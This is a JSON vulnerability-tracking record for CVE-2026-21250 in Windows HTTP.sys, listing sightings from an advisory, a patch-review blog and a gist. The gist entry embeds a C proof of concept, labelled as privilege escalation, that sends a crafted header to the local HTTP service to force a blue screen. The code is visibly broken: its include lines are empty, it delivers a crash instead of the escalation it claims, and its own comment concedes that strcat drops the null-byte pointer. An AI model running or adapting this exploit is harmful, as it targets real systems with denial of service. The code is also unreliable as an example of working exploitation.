{"vulnerability": "cve-2026-21250", "sightings": [{"uuid": "0d760d92-2393-4d4d-ae22-2aadf55fc66c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-21250", "type": "seen", "source": "https://advisories.ncsc.nl/advisory?id=NCSC-2026-0053", "content": "", "creation_timestamp": "2026-02-10T18:01:45.000000Z"}, {"uuid": "9e198994-2956-4a54-866d-9f849f5bedbc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-21250", "type": "seen", "source": "https://www.thezdi.com/blog/2026/2/10/the-february-2026-security-update-review", "content": "", "creation_timestamp": "2026-02-10T17:30:28.000000Z"}, {"uuid": "95d0f931-b850-472f-bad4-6c1582d80aa6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-21250", "type": "seen", "source": "https://gist.github.com/kasem545/f0980150996f312b69917cc80eed1e24", "content": "# Exploit Title: Windows 11 24H2  - Local Privilege Escalation \n# Google Dork: inurl:http.sys \"Windows 11 24H2\" vulnerability | intitle:\"HTTP.sys\" \"CVE-2026-21250\" \"Elevation of Privilege\"\n# Date: 2026-02-27\n# Exploit Author: London foggy snow\n# Vendor Homepage: https://www.microsoft.com/en-us/msrc\n# Software Link: https://learn.microsoft.com/en-us/windows/win32/http/http-sys\n# Version: Windows 11 24H2 (10.0.26100.7780), Windows 11 25H2 (10.0.26200.7780), Windows Server 2022 23H2 (10.0.25398.2148)\n# Tested on: Windows 11 24H2 (x64), Windows Server 2022 23H2 (Server Core x64)\n# CVE : CVE-2026-21250\n# powershell -> net start http\n\n\n\n\n#define _CRT_SECURE_NO_WARNINGS\n#include \n#include \n#include \n#include \n\n#pragma comment(lib, \"ws2_32.lib\")\n\n#define TARGET_IP \"127.0.0.1\"\n#define TARGET_PORT 80\n\nunsigned char malicious_ptr[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };\n\nchar* build_malicious_request() {\n    static char request[1024];\n    sprintf(request,\n        \"GET / HTTP/1.1\\r\\n\"\n        \"Host: localhost\\r\\n\"\n        \"X-Trigger-Ptr: \");\n\n    // Critical Pitfall: strcat truncation (core vulnerability trigger failure)\n    // Citation: \"The strcat() function terminates at the first null byte (0x00), which truncates binary malicious pointers \n    // required for CVE-2026-21250 exploitation. This causes incomplete delivery of the untrusted pointer to HTTP.sys driver, \n    // leading to failed BSOD trigger or random memory access errors instead of targeted vulnerability exploitation.\"\n\n    strcat(request, (char*)malicious_ptr);\n    strcat(request, \"\\r\\n\"\n        \"Connection: close\\r\\n\"\n        \"\\r\\n\");\n\n    return request;\n}\n\nint trigger_blue_screen() {\n    WSADATA wsaData;\n    SOCKET client_socket;\n    struct sockaddr_in target_addr;\n    int ret;\n\n    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {\n        printf(\"WSAStartup failed, error: %d\\n\", WSAGetLastError());\n        return -1;\n    }\n\n    client_socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\n    if (client_socket == INVALID_SOCKET) {\n        printf(\"socket failed, error: %d\\n\", WSAGetLastError());\n        WSACleanup();\n        return -1;\n    }\n\n    target_addr.sin_family = AF_INET;\n    target_addr.sin_port = htons(TARGET_PORT);\n    inet_pton(AF_INET, TARGET_IP, &target_addr.sin_addr);\n\n    ret = connect(client_socket, (struct sockaddr*)&target_addr, sizeof(target_addr));\n    if (ret == SOCKET_ERROR) {\n        printf(\"connect failed, error: %d\\n\", WSAGetLastError());\n        closesocket(client_socket);\n        WSACleanup();\n        return -1;\n    }\n    printf(\"[+] Connected to local HTTP service, sending malicious request...\\n\");\n\n    char* request = build_malicious_request();\n    ret = send(client_socket, request, (int)strlen(request), 0);\n    if (ret == SOCKET_ERROR) {\n        printf(\"send failed, error: %d\\n\", WSAGetLastError());\n        closesocket(client_socket);\n        WSACleanup();\n        return -1;\n    }\n    printf(\"[+] Malicious request sent, waiting for BSOD...\\n\");\n\n    Sleep(2000);\n    closesocket(client_socket);\n    WSACleanup();\n    return 0;\n}\n\nint main() {\n    printf(\"=== http.sys local BSOD test ===\\n\");\n    printf(\"WARNING: May cause BSOD! Save all work now!\\n\");\n    printf(\"Starting in 3 seconds...\\n\");\n    Sleep(3000);\n\n    int ret = trigger_blue_screen();\n    if (ret == 0) {\n        printf(\"Request sent. If no BSOD, check:\\n\");\n        printf(\"1. System is patched\\n\");\n        printf(\"2. HTTP service is not running\\n\");\n        printf(\"3. Port 80 is not listening\\n\");\n    }\n    else {\n        printf(\"Trigger failed.\\n\");\n    }\n\n    return 0;\n}\n            ", "creation_timestamp": "2026-05-12T17:33:08.000000Z"}]}